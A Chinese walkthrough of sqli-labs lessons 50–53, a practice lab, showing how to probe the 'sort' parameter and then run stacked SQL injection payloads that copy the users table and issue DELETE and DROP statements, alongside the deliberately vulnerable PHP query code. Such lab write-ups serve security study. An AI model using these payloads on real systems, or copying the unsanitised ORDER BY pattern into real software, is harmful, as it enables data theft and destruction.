zoukankan      html  css  js  c++  java

  • sqli-labs 通关指南:Less 50 ~ 53

    Less 50 ~ 53 和 Less 46 ~ 49 的注入方法完全一样,但是这 4 个 Less 可以进行堆叠注入。

    目录

    Less 50

    判断注入类型

    输入正常的参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

    ?sort=1'


    将后面的内容注释掉,网页返回错误的信息。进行下面的所有测试,得出此处存在数值型注入。

    ?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

    堆叠注入

    和 Less 46 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

    ?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

    SQL 查询语句

    $sql = "SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
      ?>
      <center>
      <font color= "#00FF00" size="4">
		
      <table   border=1'>
      <tr>
            <th>&nbsp;ID&nbsp;</th>
            <th>&nbsp;USERNAME&nbsp;  </th>
            <th>&nbsp;PASSWORD&nbsp;  </th>
      </tr>
      </font>
      </font>
      <?php
      /* store first result set */
      if ($result = mysqli_store_result($con1))
      {
            while($row = mysqli_fetch_row($result))
            {
	          echo '<font color= "#00FF11" size="3">';		
		  echo "<tr>";
		  echo "<td>";
		  printf("%s", $row[0]);
		  echo "</td>";
		  echo "<td>";
		  printf("%s", $row[1]);
		  echo "</td>";
	          echo "<td>";
		  printf("%s", $row[2]);
		  echo "</td>";
		  echo "</tr>";
		  echo "</font>";
	    }
      }
      echo "</table>";
}

    Less 51

    判断注入类型

    输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

    ?sort=1'

    将后面的内容注释掉,网页返回正常的信息,得出此处存在单引号闭合的字符型注入。

    ?sort=1'--+

    堆叠注入

    和 Less 47 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

    ?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

    SQL 查询语句

    $sql="SELECT * FROM users ORDER BY '$id'";

    Less 52

    判断注入类型

    输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

    ?sort=1'


    将后面的内容注释掉,网页无回显。进行下面的所有测试,得出此处存在数值型的盲注。

    ?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

    堆叠注入

    和 Less 48 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

    ?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

    SQL 查询语句

    $sql = "SELECT * FROM users ORDER BY $id";

    Less 53

    判断注入类型

    输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

    ?sort=1'


    将后面的内容注释掉,网页用户名列表,得出此处存在单引号闭合的字符型的盲注。

    ?sort=1'--+

    堆叠注入

    和 Less 49 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

    ?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

    SQL 查询语句

    $sql="SELECT * FROM users ORDER BY '$id'";
  • 相关阅读:
    七牛php-sdk使用
    七牛php-sdk使用-多媒体处理
    七牛php-sdk使用-文档处理
    七牛php-sdk使用-文件上传
    php爬取微信文章内容
    php解决微信文章图片防盗链
    python2.7编译安装升级python3并安装Scrapy
    centos7安装配置supervisor守护进程
    vuejs+thinkphp5+phpsocketIO+timer数据及时更新
    docker常用命令
  • 原文地址:https://www.cnblogs.com/linfangnan/p/13992119.html
Copyright © 2011-2022 走看看